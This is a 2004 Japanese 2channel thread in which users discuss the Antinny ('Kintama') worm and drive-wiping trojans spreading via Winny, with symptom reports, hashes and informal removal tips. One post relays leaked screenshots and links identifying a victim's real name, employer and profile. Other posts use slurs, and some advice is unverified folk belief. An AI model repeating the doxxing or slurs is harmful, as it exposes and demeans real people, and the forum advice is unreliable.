たまに見るけど池沼って何だ?
厨房みたいな意味か?

493 :[名無し]さん(bin+cue).rar:04/03/14 22:50 ID:2uk4LgsW
>>492
http://www.media-k.co.jp/jiten/wiki.cgi?mycmd=search&mymsg=%C3%D3%BE%C2

494 :[名無し]さん(bin+cue).rar:04/03/14 23:09 ID:+RvBNLo0
ウィルスとか作ってるバカは何のメリットがあるの?

495 :[名無し]さん(bin+cue).rar:04/03/14 23:11 ID:WljdJyJq
自分が作ったウイルスが広まる事に恍惚感を覚えるんだろう。

496 :[名無し]さん(bin+cue).rar:04/03/14 23:27 ID:1fU/DMjM
>>494
アルバイトとかいってたな

497 :[名無し]さん(bin+cue).rar:04/03/14 23:28 ID:fjSQFVWl
>>494
借金を返すためだよ

498 :[名無し]さん(bin+cue).rar:04/03/14 23:32 ID:ymRmh5v/
>>494
生き別れの弟を探す為だよ

499 :[名無し]さん(bin+cue).rar:04/03/14 23:47 ID:sUX4eE44
>>492
知障・・・知的障害者

500 :[名無し]さん(bin+cue).rar:04/03/15 00:03 ID:5qCiJSQp
test

501 :[名無し]さん(bin+cue).rar:04/03/15 00:06 ID:5qCiJSQp
写真集などをダウンロードすると
かなりの確立でフォルダーアイコンのEXEファイルが
一緒に同封されているのだけれどEXEファイルを削除して
残りの画像ファイルは持っていても問題ないですか?

502 :[名無し]さん(bin+cue).rar:04/03/15 00:07 ID:JmwkSf/N
キンタマウィルスで久々にデスクトップ.rarを思い出した。
ここ数日ですごい勢いで俺のデスクトップが増えてるな。

503 :[名無し]さん(bin+cue).rar:04/03/15 00:57 ID:O7FyKpGK
>>501
心配だったら安置ウイルスでも入れておきなさい
っつーか俺も初心者だけどしょっちゅー安置ウイルスに引っかかってる
ニューマシーンなのにこんな酷使してていいのか、って感じ

504 :[名無し]さん(bin+cue).rar:04/03/15 00:58 ID:O7FyKpGK
ごめんアゲちった
テヘ (`・ω・´)

505 :[名無し]さん(bin+cue).rar:04/03/15 01:29 ID:Mb2wWXN1
Windows2000 SP4で
ネットにアクセスして、何もダウンロードしていない状態でも
動作状況を調べると送信中となっています。
こうなったのは兄がWinnyというソフトを使いだしてからのような気がします。
ウイルスにでも感染したのでしょうか?


506 :[名無し]さん(bin+cue).rar:04/03/15 01:32 ID:Iv+mmzcN
>>505
お兄さんが、生き別れの弟を探しているのでしょう。

507 :[名無し]さん(bin+cue).rar:04/03/15 02:14 ID:/sPtfMqK



         なんかこのスレ見てたら
 
    ウイルスばらまいてみたくなりますた(´∀`)




508 :[名無し]さん(bin+cue).rar:04/03/15 02:21 ID:JDMiqvz1
うお!今気づいたのだが、外付けHDDの中にあるエロ動画のいくつかが
拡張子mp3に変えられてる・・・

509 :[名無し]さん(bin+cue).rar:04/03/15 02:24 ID:0Iu9Ep5k
a4YzaXJpxuのトリップのやつって何で嫌われているのですか?
ウイルス?中身は本物みたいだけど?
おしえてください、お願いします

510 :[名無し]さん(bin+cue).rar:04/03/15 06:16 ID:FgdXyCe8
>>332
テキストファイルを上書きしたら捨てられた。thx

511 :&rlo;トスニナオ&rle; ◆MRmxpjiK.2 :04/03/15 06:28 ID:a1/f1vHp
おまえらの人生じたいがういるす!

512 :[名無し]さん(bin+cue).rar:04/03/15 11:56 ID:VkjHYSCf
弟のPCが全ドライブ削除されました。
フォルダのみ残し、中身根こそぎ。
Divx5.1?のパッチexeが原因らしい。
参照量が多く安心したのが敗因だそうで。
Zoneによるとネットワークにアクセスを
しようとしていたらしいです。

ハッシュなどはきれいに削除されたので
不明です(w

513 :[名無し]さん(bin+cue).rar:04/03/15 12:13 ID:+uSCtytW
>>435 と全く同じ症状なんですがシステムの復元で治りませんでした。
どなたか対策のわかる方いませんか?

514 :[名無し]さん(bin+cue).rar:04/03/15 12:37 ID:wFgrE/4A
>>509
MXでゲトしたファイルを流すフンドシ厨だから。

515 :[名無し]さん(bin+cue).rar:04/03/15 12:38 ID:piuOqsa2
>>509
マルチうぜえ市ね

516 :[名無し]さん(bin+cue).rar:04/03/15 17:15 ID:GMeKHoc3
>>512
(APPz) DivXPro 5.1 日本語化+クラック Crack.zip 7ce7ac6cd02b8d78e0df3573f0f5cb2f
これでしょう、トロイの木馬型のTROJ_DELWIN.Dが入ってた。

517 :[名無し]さん(bin+cue).rar:04/03/15 18:07 ID:k6sSvEgX
>>516
全ドライブなので
TROJ_DELALL.F
ではないかと。

518 :[名無し]さん(bin+cue).rar:04/03/15 18:10 ID:9Uzxgkek
キンタマって何ですか?

519 :[名無し]さん(bin+cue).rar:04/03/15 18:11 ID:AWTtBoKi
お前にはついてないのか

520 :lo;トスニナオle;:04/03/15 18:37 ID:Ls7fTC+y
キンタマは最低1個はもっとけ

521 :[名無し]さん(bin+cue).rar:04/03/15 18:38 ID:Ls7fTC+y
やべ。自分でワロタ

522 :[名無し]さん(bin+cue).rar:04/03/15 18:41 ID:WwnXNzuA
ここは、とても悲惨なインターネッツですね。

523 :[名無し]さん(bin+cue).rar:04/03/15 18:42 ID:+foQfvSR
ハッシュはもう忘れましたが

[18禁ゲーム](040213)放課後 〜濡れた制服〜 Disc1+2(α解除済CDレス可)nrg+rr5.rar
と言うヤツをインストールすると
インストールは全て普通に終わるんだけど、その後実行ファイル(af.exeというFile)を実行すると
長い事ディスクアクセスがあってCPU占領率が100%になります。
んで、バグか?と思ってたんだけど
別ドライブのファイルがすっかり消滅してしまったんでまさかと思って
別マシンでテスト
すると、再起動後に勝手にaf.exeをされる
んで、アカウント情報がおかしくなったり、スターとメニューの内容が消えたりする症状が起きます。

おかしいと思って、af.exeをメモ帳で開いてみると
d:\Develop\Cpp\main\NyKiller\DelDrive\Release\DelDrive.pdb
こういう行がありました。
ウイルスですかね?
詳細はわからないし、メインマシンではFile消されたのに、サブでは垢消されたり・・・
ちょっと詳しい人調べてもらえません?

524 :[名無し]さん(bin+cue).rar:04/03/15 18:47 ID:DkIKj4lb
散々既出な質問してる>>523のアフォは
以後放置でおながいします。

525 :[名無し]さん(bin+cue).rar:04/03/15 18:48 ID:rlL8fgOT
それで会社の鯖消したアホが居たみたいだけど。

526 :[名無し]さん(bin+cue).rar:04/03/15 18:50 ID:EwLiAOnY
>>523

           L -‐ '´  ̄ `ヽ- 、   〉
          /           ヽ\ /
        //  /  /      ヽヽ ヽ〈
        ヽ、レ! {  ム-t ハ li 、 i i  }ト、
         ハN | lヽ八l ヽjハVヽ、i j/ l !
         /ハ. l ヽk== , r= 、ノルl lL」
        ヽN、ハ l   ┌‐┐   ゙l ノl l
           ヽトjヽ、 ヽ_ノ   ノ//レ′
    r777777777tノ` ー r ´フ/′
   j´ニゝ        l|ヽ  _/`\
   〈 ‐ 知ってるが lト、 /   〃ゝ、
   〈、ネ..         .lF V=="/ イl.
   ト |お前の態度が||ニヽ二/  l
   ヽ.|l.        〈ー-   ! `ヽ.
      |l気に入らない lトニ、_ノ    ヾ、
      |l__________l|   \    ソ

527 :523:04/03/15 18:54 ID:+foQfvSR
あらら、、、既出でしたか・・・・
トレンドマイクロのDBにもなかったので、もしかして新種だと思ったんですが・・・
先にオンラインウイルスチェッカーしてたのにも関わらず反応なかったんで・・・

とりあえず、過去ログみます。
あと、トレンドマイクロにも報告しておきます。

528 :[名無し]さん(bin+cue).rar :04/03/15 18:59 ID:OUO2Dzyv
>>524 >>526
お前ら冷たいこと言わずに教えてやれよ
と言ってみるテst

529 :[名無し]さん(bin+cue).rar:04/03/15 19:07 ID:RAZ5prqm
>>528
ならおまいが(ryと言ってみるテst

530 :[名無し]さん(bin+cue).rar:04/03/15 19:07 ID:ZXnNLs2G
>>523 俺は知らなかった

>>524 >>526 死ねや 糞虫



531 :[名無し]さん(bin+cue).rar:04/03/15 19:12 ID:DkIKj4lb
わかったよ、教えてやるよ。
前スレ見れ。

dat落ちで見れねぇよ、ヴォケとか言うんじゃねぇぞ?
にくちゃんねるとか逝きゃ普通に見れるんだから。

532 :[名無し]さん(bin+cue).rar:04/03/15 19:35 ID:7CggMjTA
似たようなのはあるが
全く同じと思われるようなのはなかったが?


533 :523:04/03/15 19:42 ID:+foQfvSR
これですね。
Fileサイズが違いますが・・・
あと、OSまでは飛ばされなかったです。
842 MB (883,142,152 バイト)
でした。

203 名前: [名無し]さん(bin+cue).rar 04/02/14 11:04 ID:eZDIu039

”放課後〜濡れた制服〜”
最近発売したソフトらしいのですが、これの1100Mくらいのファイルで
やられました。HDD消されてしまいましたデス。
ゲームのインスコまでは問題なく、スタートアップのショートカットで
実行しようとしたらHDD消去開始って感じ。
とっさに止めたものの、ny関連のトコが消えてしまったのでファイル名や
サイズの詳細をかけなくてスマソ。OSから入れなおしだよ、ママン

534 :523:04/03/15 19:48 ID:+foQfvSR
同じ物と思われますが・・・・
挙動がちょっとわからないですね、、、
Dドライブが先に消滅したので、もしかすると後のドライブから消していくのかも・・・
バイナリ見る限りシステム情報をAPIで参照してますしね。。。

535 :[名無し]さん(bin+cue).rar:04/03/15 19:54 ID:DkIKj4lb
>>534
過去ログ見たんならこれをスルーすんなよ(;´Д`)

337 名前: [名無し]さん(bin+cue).rar [sage] 投稿日: 04/02/17 18:42 ID:VTBTIEUs
>>331
そのaz.exeはゲーム本体の実行ファイルでもあるから余計にタチが悪かったり。
あと、放課後〜に関してだけだけど、ウイルス入りは404K、普通のは396Kだから
そこで見分けられたりする。俺が見付けた奴だけだけど。


536 :[名無し]さん(bin+cue).rar:04/03/15 20:40 ID:39kdWwJ5
きんたま菌に冒されてる香具師が多いな。
日に日に増えてないか?

537 :[名無し]さん(bin+cue).rar:04/03/15 21:26 ID:AmnjIrVh
>536
春だから

538 :[名無し]さん(bin+cue).rar:04/03/15 21:36 ID:DkIKj4lb
陰金田虫に注意

539 :[名無し]さん(bin+cue).rar:04/03/15 21:37 ID:sObsFRhe
>>31
http://tmp2.2ch.net/test/read.cgi/download/1079034803/658-

個人情報晒し乙

540 :[名無し]さん(bin+cue).rar:04/03/15 22:34 ID:eaxs/DLb
金玉アンチニーは、ノートンで発見できるの?
win.iniにぬるぽも健在してますか?

541 :[名無し]さん(bin+cue).rar:04/03/15 23:15 ID:HqYlQYtx
>>521

ツマンネ。

542 :[名無し]さん(bin+cue).rar:04/03/15 23:16 ID:64n83LbE
(winny)新種のウィルス派遣しますた!!!!!!!
http://tmp2.2ch.net/test/read.cgi/download/1079229875/l50

543 :[名無し]さん(bin+cue).rar:04/03/15 23:56 ID:umBxpBZp
・mpgのファイル(ドット.mpgじゃない)
をダブルクリックしてしまった。
当然「関連付け」されてないので、
「関連付け」のメニュー?が表示されたけど、
大丈夫かな?

こういう事で感染する事ってある?

544 :[名無し]さん(bin+cue).rar:04/03/15 23:57 ID:JEui1pxq
>>543
ご愁傷様

545 :[名無し]さん(bin+cue).rar:04/03/16 00:09 ID:rJm6Td0h
こえええーー(((( ;゜Д゜)))ガクガクブルブル
まじな対処法考えようぜ

546 :[名無し]さん(bin+cue).rar:04/03/16 00:10 ID:4rpIIErF
>>544
詳細きぼん

547 :[名無し]さん(bin+cue).rar:04/03/16 00:11 ID:rJm6Td0h
■新種ワーム「きんたま」■
WinnyというP2P型のファイル共有ソフトを介して広がるワーム
このワームに感染した者はPCのユーザー名と組織名とデスクトップ画像が
UPされてしまう

●感染しているかの確認方法●
Upfolder.txtファイルがファイラーでみえているかと、
フォルダ情報に登録したことのない見えないフォルダのBbs2 or Cache2
のフォルダが登録してある。

●ワームの駆除方法●
前Winnyをフォルダごと削除後に、ダウソし直したNyを再設定
すればOK

●予防方法●
不明。

●自分が感染していた場合の対処方法●
祈る。 _| ̄|○ ダメポ


548 :[名無し]さん(bin+cue).rar:04/03/16 00:11 ID:YQF9zHxi
エロゲヲタがどうなろうと知ったこっちゃない
むしろ逝け

549 :[名無し]さん(bin+cue).rar:04/03/16 00:16 ID:rJm6Td0h
.jpg自体がウイルスだから、キャッシュに経由された時点で感染。.jpgを無視にいれとけば感染しない。


550 :[名無し]さん(bin+cue).rar:04/03/16 00:18 ID:Lr4iHj5B
ダウソした時点で感染するウェルスなのか?
俄かに信じがたいが・・・ちなみに俺のデスクトップはくノ(ry

551 :[名無し]さん(bin+cue).rar:04/03/16 00:20 ID:DCvNmNFM
もう1000くらいhitするようだ

552 :[名無し]さん(bin+cue).rar:04/03/16 00:26 ID:oAUlxBJw
おれ検索したけど12個ぐらいしかヒットしなかった

553 :[名無し]さん(bin+cue).rar:04/03/16 00:31 ID:rJm6Td0h
キンタマ本体がどういったものなのか

554 :[名無し]さん(bin+cue).rar:04/03/16 00:35 ID:vWkQSfaN
これで出てくる使用者名ってのはアカウント作った時に付けた名称でいいの?
(アカウントフォルダ作成される時のフォルダ名↑)
あとで変更したPC使用者名じゃないよね?

ニュー速でスルーされたからマルチスマソ
つーかメインはダウソなのになんであっちで質問するかな、おれ。
関連スレJaneで開きまくりw

555 :[名無し]さん(bin+cue).rar:04/03/16 00:36 ID:GZT6ucTz
捏造かどうかわかるようなファイル名にしろよ>>作者

556 :[名無し]さん(bin+cue).rar:04/03/16 00:43 ID:XBpusZ+B
メモ帳のアイコンのexeファイルってなんですか?
pandoraダウンロードするといっぱい入ってるやつ。

557 :[名無し]さん(bin+cue).rar:04/03/16 00:46 ID:keZsgJ1c
>556
ぬるぽかキンタマかな?
なんなら実行して報告してw

558 :[名無し]さん(bin+cue).rar:04/03/16 00:47 ID:3ktd19Mk
キンタマウイルス実に面白いw

559 :[名無し]さん(bin+cue).rar:04/03/16 00:49 ID:XBpusZ+B
>>557
トレンドマイクロのオンラインスキャンで見たけど反応しなかった。
キンタマかはわからん。
「pandora 2004年 3月」でダウンロードするとそればっかだよ。

560 :[名無し]さん(bin+cue).rar:04/03/16 01:07 ID:DCvNmNFM
[キンタマ] 俺のデスクトップ user1 [04-03-10](ファイル詰め合わせ).zip 2,097,883 bd6a2d6f866f7268127f5a2809d81ba7

解答すると、特典写真.jpg .exe
てのがあるけどやっぱこれかね。Nortonじゃ無反応だった。

561 :[名無し]さん(bin+cue).rar:04/03/16 01:08 ID:ZxtZ7w6M
キンタマのウイルスは.exe踏まなければ、大丈夫ですか?

562 :[名無し]さん(bin+cue).rar:04/03/16 01:09 ID:JKBynOr7
キンタマってまじウケるんだけどw

563 :[名無し]さん(bin+cue).rar:04/03/16 01:11 ID:mRkMDZQK
ny使ってるやつの知り合いとのチャット内容と顔写真が一緒に共有されてるよ
その知り合いナム

564 :[名無し]さん(bin+cue).rar:04/03/16 01:18 ID:PNUhFnkR

> http://www5e.biglobe.ne.jp/~yb_net/clip/img/17351.pngLOAD
> アイコンが同じだったらクリックしてたかもしんない

思ったのだが、このexeファイルのアイコンを、
各ユーザがjpgファイルに割り当てているアイコンにすることってできないんだろうか?

565 :[名無し]さん(bin+cue).rar:04/03/16 01:22 ID:rJm6Td0h
ペンギンキタ━━━━(゚∀゚)━━━━!!!!
http://www.din.or.jp/~matyu/index2.html
http://www.din.or.jp/~matyu/index2.html
http://www.din.or.jp/~matyu/index2.html
http://www.din.or.jp/~matyu/index2.html
http://www.din.or.jp/~matyu/index2.html
http://www.din.or.jp/~matyu/index2.html


566 :[名無し]さん(bin+cue).rar:04/03/16 01:30 ID:yKBl5DNq
ネタ?

[キンタマ] 俺のデスクトップ Kubota (コンピュータソフトウェア著作権協会) [04-03-15].jpg 155,231 2afa7601924d40cda3fa55d0465de204


567 :[名無し]さん(bin+cue).rar:04/03/16 01:34 ID:LETCC9GT
キンタマは個別スレへ。
有益な情報があったらカキコよろ。


568 :[名無し]さん(bin+cue).rar:04/03/16 01:43 ID:QuxuGgLz
winny関連のワームです。
デスクトップにあるファイルやスクリーンショットを、OSに登録したユーザー名付きで
winny上に共有します。会社名や本名付きで晒されている方も居るようで((((;゚Д゚)))ガクガクブルブル


詳細はこちら
(winny)新種のウィルス派遣しますた!!!!!!!
http://tmp2.2ch.net/test/read.cgi/download/1079229875/


569 :[名無し]さん(bin+cue).rar:04/03/16 01:44 ID:QuxuGgLz
誤爆スマソ

570 :[名無し]さん(bin+cue).rar:04/03/16 01:44 ID:vWkQSfaN
>>566
おれも見たけど絶対ネタだろw

571 :[名無し]さん(bin+cue).rar:04/03/16 03:01 ID:Uw5poGxq
や る な ら と こ と ん 最 後 ま で

572 :[名無し]さん(bin+cue).rar:04/03/16 03:27 ID:O3v0mLn5
やるならとことん最後までのガイドライン
http://that.2ch.net/test/read.cgi/gline/1079372898/

573 :[名無し]さん(bin+cue).rar:04/03/16 03:37 ID:s4xLYjvw
WORM_ANTINNY.B の情報くれ。
トレンドマイクロのページにもない。


574 :[名無し]さん(bin+cue).rar:04/03/16 03:59 ID:s4xLYjvw
(1)間違えて、アイコン偽造のexe ファイルを押してしまった。

(2)トレンドマイクロのオンラインウィルススキャンで探すと。。。
WORM_ANTINNY.B
発見。

(3)問題っぽいファイルは、system32以下の msratelc32.exe
Registry にコールしている場所有り( ファイル名を_msratelc32.exe に名称変更した )
Registry の Run や win.ini には記載なし。

(4)タスクマネージャーでは、上記exeが稼動していたので、
kill して、OS restart

(5) google では、まだ、ヒットしない。

(6) http://inet.trendmicro.co.jp/ptninfo/817.htm
3/14 に更新と書いてある。かなり新しい。


575 :[名無し]さん(bin+cue).rar:04/03/16 03:59 ID:UPJzl+WE
ここか?

576 :[名無し]さん(bin+cue).rar:04/03/16 04:00 ID:KNZ4TyBI
これ本スレ?

577 :[名無し]さん(bin+cue).rar:04/03/16 04:02 ID:EByRDXtE
シベリア組は(・∀・)カエレ!!

578 :[名無し]さん(bin+cue).rar:04/03/16 04:02 ID:dvN0Bs6c
頼むから「キンタマ」で捏造警告&キャッシュ削除設定してくれ。
無駄なキー流さんでくれ。

キンタマ詰め合わせの中に、そのウイルス入りもあるみたいだし・・・
キンタマ落として、結果としてキンタマの拡散に協力してる香具師、
おまいnyネットワーク崩壊に協力してることに気づいてるか?

579 :[名無し]さん(bin+cue).rar:04/03/16 04:03 ID:dmvbN/Mu
キンタマぐらいじゃ崩壊しないでしょ

580 :[名無し]さん(bin+cue).rar:04/03/16 04:03 ID:uav8OYV7
面白がって落としまくってるヤシが大勢いるみたいだな...

落としたキンタマ詰め合わせ.zipに「たまたま」感染したファイルが入っていて、
落としまくって鑑賞してるつもりのヤシが、さらに感染を広めてるんじゃ?
という指摘が別スレであったけど、漏れが作者なら、たまたまなんて
ゆうちょうなことしないで、キンタマzipを造るときに、自分自身を
意図的に複製して、入れ込むと思うが。

581 :[名無し]さん(bin+cue).rar:04/03/16 04:05 ID:wXkwk8NL
http://no.m78.com/up/data/u027851.jpg
びっくりした

582 :[名無し]さん(bin+cue).rar:04/03/16 04:05 ID:DCvNmNFM
>>574
この騒動はWORM_ANTINNY.Bが原因って事でほぼ確定的?

583 :[名無し]さん(bin+cue).rar:04/03/16 04:08 ID:LRbfVeeI
0.1% 感染
10% 便乗してファイルを放流
20% 観戦
69.9% 存在に気づいていない

こんな感じか?

584 :[名無し]さん(bin+cue).rar:04/03/16 04:26 ID:Opo/9Jwd
厨どもにはちょうどいい目くらましだ

585 :[名無し]さん(bin+cue).rar:04/03/16 04:30 ID:Las4hF7o
見ろキンタマがゴミのようだ

586 :[名無し]さん(bin+cue).rar:04/03/16 04:33 ID:scJdvulM

これは47氏から俺らへの最後の贈り物なんだよ。
つまり、47は警察の犬に成り下がったって事だよ。
自分で蒔いた種を自分で刈り取ってるだけなのさ。

VB導入してるヤシはタスクマネージャー→プロセス
感染したファイル名ヤツを強制終了させる。
んでもって再度検索かけて隔離→全削除。
念の為にウィルスが発見されなくなるまで繰り返す。
以上

587 :[名無し]さん(bin+cue).rar:04/03/16 04:37 ID:dmvbN/Mu
[キンタマ] 俺のデスクトップ 伊集院光 (ホリプロ) [04-03-13].jpg 172,281 6423b60a5f63a6037c70d2806d32a6d3

588 :[名無し]さん(bin+cue).rar:04/03/16 04:48 ID:Las4hF7o
見ろ人がキンタマのようだ

589 :[名無し]さん(bin+cue).rar:04/03/16 04:50 ID:EByRDXtE
和田勉?

590 :[名無し]さん(bin+cue).rar:04/03/16 04:52 ID:YGLPukbA
とりあえず「キンタマ」を無視・ノード切断しときゃ良いんだな。

591 :[名無し]さん(bin+cue).rar:04/03/16 05:10 ID:Qhuq9IP7
この板自体がキンタマウィルスに感染したみたいに、
キンタマスレが増殖しとる。

592 :[名無し]さん(bin+cue).rar:04/03/16 05:21 ID:xc7MLeB6
ひとつ消えた?

593 :[名無し]さん(bin+cue).rar:04/03/16 06:05 ID:q6BaTNqo
ヽ(`Д´)ノ

594 :[名無し]さん(bin+cue).rar:04/03/16 06:06 ID:qySuWByK
キンタマの次スレ誰かヨロ
俺無理

595 :[名無し]さん(bin+cue).rar:04/03/16 06:07 ID:LODXBRki
キンタマ専用マダ?

596 :[名無し]さん(bin+cue).rar:04/03/16 06:07 ID:qySuWByK
と思ったら立ったな
【AM9:00】キンタマウィルス part4?【第二波?】
http://tmp2.2ch.net/test/read.cgi/download/1079384794/

IDにnaoが出るまで頑張るスレ
http://tmp2.2ch.net/test/read.cgi/download/1079384766/

597 :[名無し]さん(bin+cue).rar:04/03/16 06:09 ID:pklgZGm9
なんか9日にはすでにあったらしい。誰も気づかんかったのか。

598 :[名無し]さん(bin+cue).rar:04/03/16 06:12 ID:L6q3gTwb
SSなどを埋め込んだ架空のup用フォルダbbs2 or cache2は架空のファイルパスで作られる
と別スレであったんだけど、これじゃ隠し属性表示オンにしてもnyのフォルダ内には見つからない罠?

テンプレでは既存のupフォルダにSSやら詰め合わせやらが登録されるってあったんだけど
どういうときにこの架空のフォルダは発動するの?


599 :[名無し]さん(bin+cue).rar:04/03/16 06:14 ID:3Nxy2ifN
どなたかこれをなにか報告してくれませんか?
お礼用意してますです。。。

http://up.isp.2ch.net/up/d5fa4990ef2a.lzh 不明
http://up.isp.2ch.net/up/fc914e8e61ef.rar お得情報.exe

600 :[名無し]さん(bin+cue).rar:04/03/16 06:14 ID:6d5DdZFY
>>597
ネタ画像以外で[04-02-23]てのがあるんだが本物だろうか

601 :[名無し]さん(bin+cue).rar:04/03/16 06:24 ID:pklgZGm9
>>600
へえ、なんで急に広まったのか・・・。
作者も広まらなくて半分諦めてたかもな。

602 :[名無し]さん(bin+cue).rar:04/03/16 06:29 ID:6d5DdZFY
>>601
そいつのユーザー名だと02-23の次が02-29と03-01のファイル詰め合わせだから
長いこと保菌者がPCを起動させなかっただけかも

603 :[名無し]さん(bin+cue).rar:04/03/16 06:35 ID:ICsk7Xcb
「キンタマ」で地引してみたら・・・

(((((((( ;゚Д゚)))))))ガクガクブルブル

604 :[名無し]さん(bin+cue).rar:04/03/16 06:55 ID:lo47h/cY
数日前に誤って
ジャケット.txt.........................exeをクリックしてしまったが
どうやらantinny.Bってやつだったみたいだ

キンタマじゃないかと思ってたが
逆に安心したよ おっかねぇ キンタマ


605 :[名無し]さん(bin+cue).rar:04/03/16 08:04 ID:2CYpXB43
>>31
記念パピコ

606 :[名無し]さん(bin+cue).rar:04/03/16 08:06 ID:LoJeJw1p
>>31

GJ!



607 :[名無し]さん(bin+cue).rar:04/03/16 08:07 ID:XZym8AUo
>>31
第一感染者?

608 :[名無し]さん(bin+cue).rar:04/03/16 08:07 ID:qqpi6uFg
>4の無視リストを入れてたから大丈夫かな
…漏れのメアド知ってる人が感染してたら駄目かw

メルマガ発行の人が感染してたら…_| ̄|○

609 :[名無し]さん(bin+cue).rar:04/03/16 08:19 ID:1xDHPKNL
>>31
生きてるか?

610 :[名無し]さん(bin+cue).rar:04/03/16 08:20 ID:sRKgLsiJ
>>31
血しぶき飛んだ?

611 :[名無し]さん(bin+cue).rar :04/03/16 08:21 ID:f9+L/9Co
>>38
あんたひどいよ・・・

612 :[名無し]さん(bin+cue).rar:04/03/16 08:31 ID:yDlCdFPD
よいこのみんなへ

こわがらなくていいよ!
UP(あっぷ)ふぉるだを偽装(ぎそう)しちゃえ!
C:\Program Files\Winny\UP

このC(しー)の部分をZ(ぜっと)やX(えっくす)など、
きみのすきなもじにかってにかえちゃおう!
ないそではふれぬ!ないふぉるだからあっぷはできない!
むかしからのことわざだよ!おぼえておこう!!

613 :[名無し]さん(bin+cue).rar:04/03/16 08:33 ID:sQZA7/n/
>>31さんと同じVirusに感染しましたが、このスレッドを
読んで駆除を行ったところ、症状がなくなりました。

614 :[名無し]さん(bin+cue).rar:04/03/16 08:40 ID:sRKgLsiJ
しかしばら撒かれた情報は取り戻せまい・・・

615 :[名無し]さん(bin+cue).rar:04/03/16 08:45 ID:HYet/0vv
RarUtyなど圧縮ファイルの中身一覧を観ることのできるソフトで
[キンタマ] 俺のデスクトップ *** (***) [##-##-##] (詰め合わせ).lzh
の中身を観てごらん。特にリストの一番最後のファイル。

616 :[名無し]さん(bin+cue).rar:04/03/16 09:00 ID:dYSaUoru
>>615
見たけどよくわからんかったよ

617 :[名無し]さん(bin+cue).rar:04/03/16 09:03 ID:bafeP+Dk
キンタマ

618 :[名無し]さん(bin+cue).rar:04/03/16 09:17 ID:HZlHJsqE
ノートン対応まだかなー>キンタマ

619 :[名無し]さん(bin+cue).rar:04/03/16 09:31 ID:tr+sqWPU
WORM_ANNTINNY.Bキタ━━━━━━(゚∀゚)━━━━━━ !!!!!
でもウィルスデータベースには載ってない。

620 :[名無し]さん(bin+cue).rar:04/03/16 09:40 ID:Tlw7Y6bq
30 名前:ニュー速からもってきた[] 投稿日:04/03/16(火) 06:48 ID:ecX+r6dh
WinnyでPCの使用者名とデスクトップを晒す新種のワームが発生7
http://ex4.2ch.net/test/read.cgi/siberia/1079380382/

http://no.m78.com/up/data/u027846.jpg
http://no.m78.com/up/data/u027805.jpg
http://no.m78.com/up/data/u027804.jpg
http://no.m78.com/up/data/u027831.jpg
http://no.m78.com/up/data/u027793.jpg

本名でぐぐるとTBSドラマの編集マンと判明
ヤフーのプロフィールと一致
他いろいろ個人情報判明
http://www.google.co.jp/search?q=%E9%A3%AF%E6%B3%89%E6%94%BF%E7%9B%B4&ie=UTF-8&oe=UTF-8&hl=ja&lr=
http://profiles.yahoo.co.jp/cueup2001

621 :[名無し]さん(bin+cue).rar:04/03/16 09:42 ID:Z/s6TBV4
WORM_ANNTINNY.Bが発見されましたとでるのですがどうすればいいんでつか?ウイルスバスターで削除できないんでつが・・・・・

622 :[名無し]さん(bin+cue).rar:04/03/16 09:44 ID:gZAft3Dk
>>600
[04-02-23]という画像を放流してしまったPCの日付設定が間違ってる。


623 :[名無し]さん(bin+cue).rar:04/03/16 09:44 ID:KaNeohVR
Anntinnyって、アンチウィニーって意味だったのか

624 :[名無し]さん(bin+cue).rar:04/03/16 09:48 ID:XOSx//rh
>>621
>>1

625 :[名無し]さん(bin+cue).rar:04/03/16 10:24 ID:dYPBVNwM
今、cacheinfo使ってキャッシュみたらデスクトップが公開されてました・・・・。(TT)
これってキンタマですよね?
一応デスクのjpgのキャッシュは削除したのですが、その後どういう対処をしたらいいですか?
まだ、何か残ってますか?

626 :[名無し]さん(bin+cue).rar:04/03/16 10:38 ID:MNIf2lBd
>>625
しばらくの間はwinnyを使わないほうがいいよ

627 :[名無し]さん(bin+cue).rar:04/03/16 10:38 ID:EByRDXtE
記念パピコ

628 :[名無し]さん(bin+cue).rar:04/03/16 10:51 ID:XOSx//rh
>>625
●推奨無視ワード”キンタマ デスクトップ”。捏造警告&キャッシュ削除してください。
ウイルスと無駄キーの拡散阻止に協力してください。
●ウイルス対策ソフトの更新まで、nyで落としたあらゆる.exeファイルの実行は控えてください。」
●nyあるいはそれ以外の方法でキンタマワームを踏んでしまう
 (現在確認されてるのは 特典写真.jpg                              .exe)
●感染したらnyとは関係なくランダムな時間にデスクトップのスクリーンショットを取られる。
●それと、デスクトップにあるファイルをまとめて [キンタマ] 俺のデスクトップ PCのユーザー名[日付](ファイル詰め合わせ).lzh
 という形に圧縮してnyのupフォルダに置かれる。その時UpFolder.txtも書き換えられる。
●nyを接続すると知らない間にそれを落とされる。

大規模P2Pデスクトップ晒し+デスクトップファイル共有ソフト
         ┏━━ω━━┓
         ω きんたま ω
         ┗━━ω━━┛
『お約束』
 ・ やるならとことん最後まで
 ・ お尻を試してごらん
 ・ (・∀・)コンニチハ!!


629 :[名無し]さん(bin+cue).rar:04/03/16 10:51 ID:k9TnU/Z+
 拝啓 節分も過ぎ、日差しも春の気配を含んでいる様子です。
さて、先日、お年玉をちょうだいいたしました。お心遣い恐縮至極に存じます。
 またアルバイトを始める事となりました。今後ともご指導くださるようお願い申しあげます。
末筆ながら、時節柄ご自愛のほどお祈り申しあげます。
 まずは取り急ぎ、お礼申しあげます。
                                 敬具

              山田 拓史

630 :[名無し]さん(bin+cue).rar:04/03/16 10:53 ID:sdAUyO5U
本スレ参考に軽くまとめ。
記念カキコは本スレで、こちらはウイルス対策だけでよろ。


感染ルート
・nyあるいはそれ以外の方法でキンタマワームを踏む
 (現在確認されてるのは 特典写真.jpg                              .exe)
症状
・感染したらnyとは関係なくランダムな時間にデスクトップのスクリーンショットを取られる。
・デスクトップにあるファイルをまとめて [キンタマ] 俺のデスクトップ PCのユーザー名[日付](ファイル詰め合わせ).lzh
 という形に圧縮してnyのupフォルダに置かれる。その時UpFolder.txtも書き換えられる。
・nyを接続すると知らない間にny経由でこれらを落とされる。
対策予防策
・推奨無視ワード「キンタマ」「デスクトップ」。
・今回に関わらず、nyで落とした.exeファイルの実行を控える。


631 :[名無し]さん(bin+cue).rar:04/03/16 10:56 ID:m9KtyIHe
あーん?要は、winnyがインスコされてない奴は感染しても関係ないんだろ?

632 :[名無し]さん(bin+cue).rar:04/03/16 10:57 ID:MNIf2lBd
>>631
うん

633 :[名無し]さん(bin+cue).rar:04/03/16 11:00 ID:4kcWMV2j
ウイルス使ってNY崩壊させようってことだろ今回の
これって逮捕者でないの?崩壊させるためならそういうことしていいの?

